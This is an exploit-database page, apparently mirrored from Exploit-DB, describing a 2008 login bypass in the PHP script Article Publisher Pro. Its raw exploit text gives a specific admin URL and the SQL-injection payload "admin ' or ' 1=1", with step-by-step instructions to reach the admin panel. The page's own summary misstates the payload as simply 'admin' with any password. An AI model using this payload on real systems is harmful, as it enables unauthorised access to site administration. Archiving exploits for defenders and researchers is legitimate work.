header-logo
Suggest Exploit
vendor:
Article Publisher Pro
by:
Hakxer
7.5
CVSS
HIGH
Bypass Login
287
CWE
Product Name: Article Publisher Pro
Affected Version From: Article Publisher Pro
Affected Version To: Article Publisher Pro
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Bypass Login

A vulnerability exists in Article Publisher Pro, which allows an attacker to bypass the authentication process by entering 'admin' in the username field and any value in the password field.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# Discovered by : Hakxer
# Type Gap : Bybass Login
# Script : Article Publisher Pro : http://www.phparticlescript.com/
# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
[~] Exploit 
[~] In Username Write : admin ' or ' 1=1
[~] In Password Write any thing Example : Hakxer
[~] Click Login ..! Now You Are In admin panel

# Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR